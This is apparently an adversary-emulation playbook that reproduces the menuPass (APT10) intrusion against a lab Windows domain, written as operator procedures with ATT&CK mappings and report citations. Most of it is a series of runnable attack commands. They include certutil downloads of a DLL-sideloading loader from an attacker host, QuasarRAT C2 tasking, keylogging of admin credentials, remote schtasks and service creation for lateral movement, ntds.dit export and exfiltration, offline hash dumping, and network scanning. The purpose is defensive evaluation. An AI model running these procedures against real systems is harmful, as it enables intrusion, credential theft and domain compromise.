# menuPass Scenario Overview

# Step 0 - Operator Setup

# ☣️ Procedures

  • Initiate an RDP session to the Windows jumpbox homelander (

  • Search for Command Prompt and right-click Run As Administrator. Execute the following command to start the Quasar C2 server:

    C:\menu_pass\Resources\Quasar\bin\Release\net472\Quasar.exe -c C:\menu_pass\Resources\Quasar\quasar.p12
  • ➡️ Initiate an RDP session to the Kali attack host kraken (

  • In a new terminal window, start the evalsC2server, ensuring the following handlers are enabled:

    • QuasarRAT
    • SodaMaster
    • Simple file server
    cd menu_pass/Resources/control_server
    sudo go build -o controlServer main.go
    sudo ./controlServer -c config/msr2_handler_config.yml
  • Right-click within the terminal window and click "Split Terminal Horizontally". Within the new terminal, change directory to the location of the evalsC2client.py and use this terminal for tasking implants.

    cd menu_pass/Resources/control_server

# Step 1 - Establish Persistence

# 🎤 Voice Track

menuPass gains initial access via stolen credentials with local administrative privileges. These credentials allow the adversary to access the Microsoft Internet Information Services (IIS) web server gabumon ( in Subsidiary A’s environment via RDP.

After establishing access on the IIS server gabumon (, menuPass downloads Sigloader, its components, and the encrypted QuasarRAT module on the victim device using certutil. SigLoader is a multi-layer loader that loads and decrypts the target payload. Eventually, SigLoader will load the first payload, FYAnti, in memory.

FYAnti decrypts the first embedded .NET module and executes the module using the CppHostCLR technique to avoid dropping additional files to disk. When executed, the first embedded .NET module then enumerates files to find the QuasarRAT .NET module on disk, decrypts it, and then executes it.

QuasarRAT, which has been modified and heavily obfuscated, checks first for internet connectivity then connects to the C2 server using a redirector at notepad-plusplus-updates[.]com (

# ☣️ Procedures

  • From the Windows jumpbox homelander (, using the provided stolen system credentials, RDP to the IIS Server gabumon (

    Username Password
    DIGIRUNAWAY\kizumi ydJEeqNzN4Xqkd9h@
  • Open Command Prompt with administrative privileges

  • Execute certutil to download SigLoader and FYAnti components.

    certutil.exe -urlcache -f http://ten-cent.us/files/VERSION.dll "C:\Program Files\Notepad++\VERSION.dll"
    certutil.exe -urlcache -f http://ten-cent.us/files/skt.dll %SYSTEMROOT%\System32\skt.dll
    certutil.exe -urlcache -f http://ten-cent.us/files/mshtml.wpf.wfx %SYSTEMROOT%\Microsoft.NET\mshtml.wpf.wfx
    certutil.exe -urlcache -f http://ten-cent.us/files/ngen.old2.log %SYSTEMROOT%\Microsoft.NET\Framework64\v4.0.30319\ngen.old2.log
    • Note:
      • VERSION.dll is a symbolic link to menu_pass/Resources/payloads/sigloader/IIS_layer1.dll
      • skt.dll is a symbolic link to menu_pass/Resources/payloads/sigloader/IIS_layer2.dll
      • mshtml.wpf.wfx is a symbolic link to menu_pass/Resources/payloads/sigloader/IIS_fyanti.dll
      • ngen.old2.log is a symbolic link to menu_pass/Resources/payloads/sigloader/Client.exe.enc
  • Execute NotePad++.exe to perform DLL sideloading. SigLoader will load FYAnti and FYAnti will load QuasarRAT.

    "C:\Program Files\Notepad++\notepad++.exe"
    • NOTE: the current working directory should be C:\Windows\System32. This is where the Quasar clientmanagement.log will be dropped.
  • Confirm C2 registration of QuasarRAT

  • Minimize Notepad++ and close out of all other windows, then disconnect from the RDP session (do not sign out)

# 🔍 Reference Code & Reporting

  1. https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
  2. http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
  3. https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
  4. https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
  5. https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage
  6. https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
  7. https://www.lac.co.jp/lacwatch/report/20201201_002363.html
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
RDP to the IIS server - T1021.001 Remote Services: Remote Desktop Protocol Kaspersky
Authenticate with IIS admin credentials - T1078.002 Valid Accounts: Domain Accounts Kaspersky
Open cmd - T1059.003 Command and Scripting Interpreter: Windows Command Shell BlackBerry
Execute certutil to download Sigloader, FYAnti, and QuasarRAT components - T1105 Ingress Tool Transfer Symantec
Dropped files were modified to contain shellcode SigFlip documentation T1027.009 Obfuscated Files or Information: Embedded Payloads Kaspersky
Dropped files' signatures are still valid SigFlip documentation T1553.002 Subvert Trust Controls: Code Signing Kaspersky
Execute Notepad++.exe to perform DLL sideloading - T1574.002 Hijack Execution Flow: DLL Side-Loading Kaspersky
SigLoader decrypts shellcode (combination of XOR/AES/DES) decrypt T1140 Deobfuscate/Decode Files or Information Kaspersky
SigLoader reflectively loads and executes FYAnti run_code T1620 Reflective Code Loading Kaspersky
FYAnti contains an embedded .NET assembly embedded.hpp T1027.009 Obfuscated Files or Information: Embedded Payloads Kaspersky
FYAnti reflectively loads and executes the QuasarRAT loader via CppHostClr execute_ssembly T1620 Reflective Code Loading Kaspersky
QuasarRAT loader is obfuscated using ConfuserEx ConfuserEx Settings T1027.002 Obfuscated Files or Information: Software Packing BlackBerry
QuasarRAT loader decrypts QuasarRAT Decrypt T1140 Deobfuscate/Decode Files or Information BlackBerry
QuasarRAT loader loads and executes QuasarRAT FindModule, Invoke T1620 Reflective Code Loading BlackBerry Kaspersky
QuasarRAT communicates over TCP Connect T1095 Non-Application Layer Protocol Quasar Github
QuasarRAT C2 communications use TLS SslStream T1573.002 Encrypted Channel: Asymmetric Cryptography Quasar Github
QuasarRAT C2 communications are encrypted with symmetric encryption Connect T1573.001 Encrypted Channel: Symmetric Cryptography BlackBerry
QuasarRAT starts keylogging Keylogger T1056.001 Input Capture: Keylogging BlackBerry

# Step 2 - Initial Discovery

# 🎤 Voice Track

After establishing communications with the C2 server, menuPass will use QuasarRAT to execute scripted discovery actions and discover the presence of a domain controller on Subsidiary A’s network.

# ☣️ Procedures

  • Using QuasarRAT, download the PowerShell discovery script to the IIS Server

    ./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\step2discovery.ps1", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\ekR9TmrCQa1Q.ps1"}'
  • Using QuasarRAT, execute the PowerShell discovery script

    ./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 1, "proc_path":"powershell.exe", "proc_args": "\"C:\\Users\\kizumi\\AppData\\Local\\Temp\\ekR9TmrCQa1Q.ps1\""}'

# 🔍 Reference Code & Reporting

  1. https://blogs.blackberry.com/en/2019/06/threat-spotlight-menupass-quasarrat-backdoor
  2. https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934
  3. https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
  4. https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
  5. https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
  6. https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-
  7. https://web.archive.org/web/20191028183408/https://blog.ensilo.com/uncovering-new-activity-by-apt10
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
QuasarRAT execute commands ExecuteProcess T1106 Native API BlackBerry
QuasarRAT executes PowerShell discovery script ExecuteProcess T1059.001 Command and Scripting Interpreter: PowerShell Kaspersky
PowerShell script executes ipconfig /all step2discovery.ps1 T1016 System Network Configuration Discovery Quasar Github
PowerShell script executes nslookup step2discovery.ps1 T1016 System Network Configuration Discovery Quasar Github

# Step 3 - Credential Access and Privilege Escalation

# 🎤 Voice Track

Eventually, the IIS Server admin logs in to the IIS Server gabumon ( While performing tasks, they eventually need to type in their Domain Admin credentials. Using QuasarRAT's keylogger utility, menuPass captures the domain admin credentials.

menuPass initiates a new RDP to the IIS server gabumon ( using the compromised credentials from Step 1.

Using the RDP to the IIS Server gabumon (, menuPass opens PowerShell with administrative privileges and authenticates using the domain admin's credentials.

# ☣️ Procedures

Emulate the following legitimate user activity:

  • ➡️ initiate an RDP session from the jumpbox homelander ( to gabumon ( as the IIS Admin:

    Username Password
    DIGIRUNAWAY\kizumi ydJEeqNzN4Xqkd9h@
  • Open Command Prompt with administrative privileges, execute cmd via runas with their Domain Admin username, typing the password when prompted:

    runas /user:DIGIRUNAWAY\kizumi.da cmd
    • Type, DO NOT copy and paste, the following when prompted:
  • Close the Command Prompts then disconnect from the RDP when finished. You should return to homelander (

Resume red team activity

  • Using the first QuasarRAT on the IIS server gabumon (, retrieve keylogs:

    ./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 4}'
  • Initiate a new RDP to the IIS server gabumon ( using the stolen credentials from Step 1.

    Username Password
    DIGIRUNAWAY\kizumi ydJEeqNzN4Xqkd9h@
  • Within the RDP to the IIS server gabumon (, open Command Prompt with administrative privileges (if not already open) then execute the following runas command, entering the kizumi.da password when prompted:

    runas /netonly /user:DIGIRUNAWAY\kizumi.da cmd.exe

# 🔍 Reference Code & Reporting

  1. https://blogs.blackberry.com/en/2019/06/threat-spotlight-menupass-quasarrat-backdoor
  2. https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934
  3. https://web.archive.org/web/20191028183408/https://blog.ensilo.com/uncovering-new-activity-by-apt10
  4. https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
  5. https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
  6. https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
  7. https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
  8. https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
Keylog domain admin credentials Keylogger T1056.001 Input Capture: Keylogging Quasar Github
RDP to the IIS server - T1021.001 Remote Services: Remote Desktop Protocol Kaspersky
Authenticate with IIS admin credentials - T1078.002 Valid Accounts: Domain Accounts Kaspersky
Open Command Prompt - T1059.003 Command and Scripting Interpreter: Windows Command Shell BlackBerry
Authenticate with domain admin credentials - T1078.002 Valid Accounts: Domain Accounts Kaspersky

# Step 4 - Lateral Movement to Subsidiary A Domain Controller

# 🎤 Voice Track

Using the first QuasarRAT implant, menuPass downloads a second copy of SigLoader/QuasarRAT to the IIS Server gabumon ( then uses the elevated Command Prompt to move the executable to the Subsidiary A Domain Controller parrotmon (

Using the elevated Command Prompt, menuPass uses the schtasks utility to remotely create and run a scheduled task on the Subsidiary A Domain Controller parrotmon ( that executes a legitimate executable: Notepad++.exe.

This legitimate executable executes SigLoader via DLL side-loading and results in a second QuasarRAT implant on the Subsidiary A Domain Controller parrotmon ( This second QuasarRAT implant will connect to the C2 server using a redirector at notepad-plusplus-updates[.]eu (

# ☣️ Procedures

  • Using the QuasarRAT on the IIS Server gabumon (, download a second copy of SigLoader/QuasarRAT components. Wait until each command has returned before executing the next.

    • SigLoader layer 1

      ./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\DC_layer1.dll", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\VERSION.dll"}'
    • SigLoader layer 2

      ./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\DC_layer2.dll", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\nhi.dll"}'
    • FYAnti

      ./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\DC_fyanti.dll", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\mshtmled.wpf.cfg"}'
    • QuasarRAT

      ./evalsC2client.py --set-task F5B06FACBDB06686ABA3E958BE433EF5 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\Client.exe.enc", "transfer_dst": "C:\\Users\\kizumi\\AppData\\Local\\Temp\\ngen.old3.log"}'
  • Return to the elevated Command Prompt on the IIS server gabumon ( and move the downloaded components to the Subsidiary A Domain Controller via SMB.

    move C:\Users\kizumi\AppData\Local\Temp\VERSION.dll "\\\C$\Program Files\Notepad++\"
    move C:\Users\kizumi\AppData\Local\Temp\nhi.dll \\\admin$\System32
    move C:\Users\kizumi\AppData\Local\Temp\mshtmled.wpf.cfg \\\admin$\Microsoft.NET
    move C:\Users\kizumi\AppData\Local\Temp\ngen.old3.log \\\admin$\Microsoft.NET\Framework64\v4.0.30319\
  • Using the elevated Command Prompt on the IIS server gabumon (, remotely create a scheduled task on the Subsidiary A Domain Controller parrotmon ( to execute a legitimate executable that sideloads SigLoader.

    schtasks /create /s /u DIGIRUNAWAY\kizumi.da /p ydJEeqNzN4Xqkd9h@ /tn "Notepad++ Script" /tr "\"C:\Program Files\Notepad++\notepad++.exe\"" /ru DIGIRUNAWAY\kizumi.da /rp ydJEeqNzN4Xqkd9h@ /rl HIGHEST /sc MINUTE /mo 15 /f
  • Using the elevated Command Prompt on the IIS server gabumon (, remotely run the scheduled task created on the Subsidiary A Domain Controller parrotmon (

    schtasks /run /s /u DIGIRUNAWAY\kizumi.da /p ydJEeqNzN4Xqkd9h@ /tn "Notepad++ Script"
  • Confirm C2 registration of a second QuasarRAT implant.

# 🔍 Reference Code & Reporting

  1. http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
  2. https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
  3. https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
Download 2nd SigLoader/QuasarRAT (non-keylogging) Execute File Download T1105 Ingress Tool Transfer BlackBerry
Use elevated Command Prompt - T1059.003 Command and Scripting Interpreter: Windows Command Shell BlackBerry
Create scheduled task - T1603 Scheduled Task/Job Kaspersky
Run scheduled task - T1603 Scheduled Task/Job Kaspersky
Dropped files were modified to contain shellcode SigFlip documentation T1027.009 Obfuscated Files or Information: Embedded Payloads Kaspersky
Dropped files' signatures are still valid SigFlip documentation T1553.002 Subvert Trust Controls: Code Signing Kaspersky
Execute Notepad++.exe to perform DLL sideloading - T1574.002 Hijack Execution Flow: DLL Side-Loading Kaspersky
SigLoader decrypts shellcode (combination of XOR/AES/DES) decrypt T1140 Deobfuscate/Decode Files or Information Kaspersky
SigLoader reflectively loads and executes FYAnti run_code T1620 Reflective Code Loading Kaspersky
FYAnti contains an embedded .NET assembly embedded.hpp T1027.009 Obfuscated Files or Information: Embedded Payloads Kaspersky
FYAnti reflectively loads and executes the QuasarRAT loader via CppHostClr execute_ssembly T1620 Reflective Code Loading Kaspersky
QuasarRAT loader is obfuscated using ConfuserEx ConfuserEx Settings T1027.002 Obfuscated Files or Information: Software Packing BlackBerry
QuasarRAT loader decrypts QuasarRAT Decrypt T1140 Deobfuscate/Decode Files or Information BlackBerry Kaspersky
QuasarRAT loader loads and executes QuasarRAT FindModule, Invoke T1620 Reflective Code Loading BlackBerry Kaspersky
QuasarRAT communicates over TCP Connect T1095 Non-Application Layer Protocol Quasar Github
QuasarRAT C2 communications use TLS SslStream T1573.002 Encrypted Channel: Asymmetric Cryptography Quasar Github
QuasarRAT C2 communications are encrypted with symmetric encryption Connect T1573.001 Encrypted Channel: Symmetric Cryptography BlackBerry

# Step 5 - Credential Access and Discovery

# 🎤 Voice Track

After gaining access on the Subsidiary A Domain Controller parrotmon (, menuPass uses the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon ( to execute the native ntdsutil.exe utility to export the Active Directory database to ntds.dit. Then, menuPass uses QuasarRAT to exfiltrate the generated ntds.dit and SYSTEM hive files then dumps credentials offline to retrieve hashes of authenticated users. These hashes are cracked offline to retrieve plaintext passwords for the domain users.

menuPass then performs an internal port scan to search for open RDP and SMB ports on the network. A reverse nslookup is then performed against the active IP addresses to resolve the hostnames.

# ☣️ Procedures

  • Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, execute whoami to get the user SID of kizumi.da

    ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"whoami.exe", "proc_args": "/all"}'
  • Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, create folder $RCXNYCG in kizumi.da's Recycle Bin (C:\$Recycle.Bin\S-1-5-21-156812349-472333277-3174882868-1109\$RCXNYCG).

    ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"cmd.exe", "proc_args": "/c mkdir C:\\$Recycle.Bin\\S-1-5-21-156812349-472333277-3174882868-1109\\$RCXNYCG"}'
  • Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, execute ntdsutil.exe to generate ntds.dit.

    ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"ntdsutil.exe", "proc_args": "\"ac i ntds\" \"i\" \"c f C:\\$Recycle.Bin\\S-1-5-21-156812349-472333277-3174882868-1109\\$RCXNYCG\" q q"}'
  • Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, exfiltrate the generated ntds.dit file.

    ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 3, "transfer_src": "C:\\$Recycle.Bin\\S-1-5-21-156812349-472333277-3174882868-1109\\$RCXNYCG\\Active Directory\\ntds.dit", "transfer_dst": "ntds.dit"}'
  • Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, exfiltrate the generated SYSTEM file

    ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 3, "transfer_src": "C:\\$Recycle.Bin\\S-1-5-21-156812349-472333277-3174882868-1109\\$RCXNYCG\\registry\\SYSTEM", "transfer_dst": "SYSTEM"}'
  • Using impacket, locally dump credentials to retrieve hashes of authenticated users, validate the NTLM hash of kizumi.da is contained in the output:

    impacket-secretsdump -system files/SYSTEM -ntds files/ntds.dit local | grep 6265fbabbdaa3ee71df61bd9f3c77d68
  • Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, port scan the workstations of the Subsidiary A network.

    ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 5, "range": "", "ports":[22, 53, 80, 445, 3389], "timeout": 300}'
  • Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, execute nslookup against the active hosts. Wait until each command has returned before executing the next.

    1. phantomon
      ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"nslookup.exe", "proc_args": ""}'
    2. ghostmon
      ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"nslookup.exe", "proc_args": ""}'
    3. cecilmon
      ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"nslookup.exe", "proc_args": ""}'

# 🔍 Reference Code & Reporting

  1. http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
  2. https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
  3. https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
QuasarRAT execute commands ExecuteProcess T1106 Native API BlackBerry
QuasarRAT creates folder $RCXNYCG in kizumi.da's Recycle Bin - T1074.001 Data Staged: Local Data Staging pwc
Execute ntdsutil.exe - T1003.003 OS Credential Dumping: NTDS JSAC-jpcert
Exfiltrate ntds.dit from Recycle Bin - T1041 Exfiltration Over C2 Channel pwc
Exfiltrate SYSTEM from Recycle Bin - T1041 Exfiltration Over C2 Channel pwc
Port scan Subsidiary A network PortScanHandler.cs T1046 Network Service Discovery Kaspersky
Nslookup hosts - T1016 System Network Configuration Discovery Kaspersky

# Step 6 - Preparation for Lateral Movement onto Subsidiary B Network

# 🎤 Voice Track

menuPass performs additional Active Directory enumeration, through which the following are identified:

  • A trusted domain DIGIREVENGE
  • A bastion workstation kimeramon ( in DIGIREVENGE allowing authentication for Subsidiary A users
  • Hosts and users within DIGIREVENGE

Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, menuPass downloads SigLoader and its necessary components to the Subsidiary A Domain Controller, then moves them to the bastion workstation kimeramon (

Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, menuPass then remotely creates a service on the bastion workstation kimeramon ( to execute a legitimate binary that will sideload SigLoader.

# ☣️ Procedures

  • Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, execute dsquery to enumerate further information on the active hosts

    ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"dsquery.exe", "proc_args": "* -filter \"(objectCategory=computer)\" -attr *"}'
  • Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, execute dsquery to enumerate further information on trusted domains

    ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"dsquery.exe", "proc_args": "* -filter \"(objectCategory=trusteddomain)\" -attr *"}'
    • Ensure DIGIREVENGE is listed as a trusted domain
    grep 'flatname: digirevenge' logs.txt -ia -C 10
  • Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, execute dsquery to enumerate further information on the active hosts within DIGIREVENGE

    ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"dsquery.exe", "proc_args": "* -filter \"(objectCategory=computer)\" -domain DIGIREVENGE -attr *"}'
    • Ensure kimeramon ( is listed in the output
    grep 'Workstation Contractor Bastion' logs.txt -ia
  • Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, execute dsquery to enumerate further information on the users within DIGIREVENGE

    ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 1, "proc_path":"dsquery.exe", "proc_args": "* -filter \"(&(objectclass=User)(objectCategory=Person))\" -domain DIGIREVENGE -attr *"}'
  • Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, download SigLoader and its necessary components (SodaMaster version) and move them to the bastion workstation kimeramon ( Wait until each command has returned before executing the next.

    • SigLoader layer 1

      ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\bastion_layer1.dll", "transfer_dst": "\\\\kimeramon.digirevenge.net\\C$\\Program Files\\Notepad++\\VERSION.dll"}'
    • SigLoader layer 2

      ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\bastion_layer2.dll", "transfer_dst": "\\\\kimeramon.digirevenge.net\\admin$\\System32\\hkp.dll"}'
    • SodaMaster

      ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"type": 2, "transfer_src": "C:\\menu_pass\\Resources\\payloads\\quasar\\sodamaster.dll", "transfer_dst": "\\\\kimeramon.digirevenge.net\\admin$\\System32\\win64_tools.dll"}'
  • Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, remotely create a service on the bastion workstation kimeramon ( to execute a legitimate binary that will sideload SigLoader

    ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"seq": 1, "type": 1, "proc_path": "sc.exe", "proc_args": "\\\\kimeramon.digirevenge.net create Notepad binpath= \"cmd /c \\\"C:\\Program Files\\Notepad++\\notepad++.exe\\\"\" error= ignore start= demand"}'

# 🔍 Reference Code & Reporting

  1. https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
  2. http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
  3. https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
  4. https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
  5. https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
  6. https://www.lac.co.jp/lacwatch/report/20201201_002363.html
  7. https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2020_5_en.pdf
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
Execute dsquery to enumerate active host information - T1018 Remote System Discovery Kaspersky
Execute dsquery to enumerate trusted domains - T1482 Domain Trust Discovery Kaspersky
Execute dsquery to enumerate user information - T1087.002 Account Discovery: Domain Account Kaspersky
QuasarRAT downloads files Execute File Download T1105 Ingress Tool Transfer BlackBerry
Dropped files were modified to contain shellcode SigFlip documentation T1027.009 Obfuscated Files or Information: Embedded Payloads Kaspersky
Dropped files' signatures are still valid SigFlip documentation T1553.002 Subvert Trust Controls: Code Signing Kaspersky
QuasarRAT execute commands ExecuteProcess T1106 Native API BlackBerry
Create service - T1543.003 Create or Modify System Process: Windows Service Mandiant

# Step 7 - Lateral Movement onto Subsidiary B Network

# 🎤 Voice Track

Using the QuasarRAT implant on the Subsidiary A Domain Controller parrotmon (, menuPass remotely executes the created service on the bastion workstation kimeramon ( to execute a legitimate binary that will sideload SigLoader.

On execution, SigLoader will again perform its layered loading, with the final loaded payload this time being SodaMaster. Once SodaMaster is executed, it will perform the following initialization steps:

  • Perform automated host discovery
  • Execute anti-sandbox checks
  • Add itself to Windows Defender's whitelist
  • Check Defender configurations
  • Establish C2 communication using a redirector at notepad-plusplus[.]eu (

Eventually, a file server administrator kmimi from Subsidiary B's network RDPs in to the bastion workstation kimeramon ( to perform tasks then disconnects from their session when complete.

# ☣️ Procedures

  • Using the QuasarRAT implant on the Domain Controller, remotely execute the created service

    ./evalsC2client.py --set-task 7C2AA823335FAE8D17090D191845A725 '{"seq": 1, "type": 1, "proc_path": "sc.exe", "proc_args": "\\\\kimeramon.digirevenge.net start Notepad"}'
    • This command should return FAILED 1053. This is expected because notepad++.exe is not configured as a service binary that would properly respond to the service manager. However, notepad++.exe will still execute and should remain running even after the command returns the failed message.
  • Confirm C2 registration of SodaMaster

Emulate the following legitimate user activity:

  • ➡️ initiate an RDP session from the jumpbox homelander ( to kimeramon ( as the file server administrator:

    Username Password
    DIGIREVENGE\kmimi cHjc3p3hJHJYPUzT@
  • Open Command Prompt, mount the file share:

    net use F: \\\F$ /persistent:yes
  • Check the drive was mounted properly:

    net use
  • Disconnect from RDP and you should return to homelander (

Resume red team activity

# 🔍 Reference Code & Reporting

  1. https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/
  2. http://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf
  3. https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf
  4. https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf
  5. https://www.trendmicro.com/ja_jp/research/21/l/Sigloader-by-Earth-Tengshe.html
  6. https://www.lac.co.jp/lacwatch/report/20201201_002363.html
  7. https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2020_5_en.pdf
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
Execute Notepad++.exe to perform DLL sideloading - T1574.002 Hijack Execution Flow: DLL Side-Loading Kaspersky
SigLoader decrypts shellcode (combination of XOR/AES/DES) decrypt T1140 Deobfuscate/Decode Files or Information Kaspersky
SigLoader reflectively loads and executes SodaMaster run_code T1620 Reflective Code Loading Kaspersky
SodaMaster uses stackstrings for obfuscation StackStrings documentation T1027 Obfuscated Files or Information Kaspersky
SodaMaster uses native APIs SodaMaster T1106 Native API JSAC-jpcert
SodaMaster collects username via GetUserName API GetCurrentUserName T1033 System Owner/User Discovery JSAC-jpcert
SodaMaster collects hostname via GetComputerNameA API GetCurrentComputerName T1082 System Information Discovery JSAC-jpcert
SodaMaster collects processor architecture and build information via GetSystemInfo and GetProductInfo APIs GetSMSysInfo T1082 System Information Discovery JSAC-jpcert
SodaMaster checks Model-Specific Register range used by hypervisors (anti-vm) MSRCheck T1497.001 System Checks JSAC-jpcert
SodaMaster checks number of CPU cores is not 1 via GetSysInfo API (anti-vm) CheckProcCount T1497.001 System Checks JSAC-jpcert
SodaMaster checks running processes via CreateToolhelp32Snapshot API (anti-vm) CheckVMProcess T1497.001 System Checks JSAC-jpcert
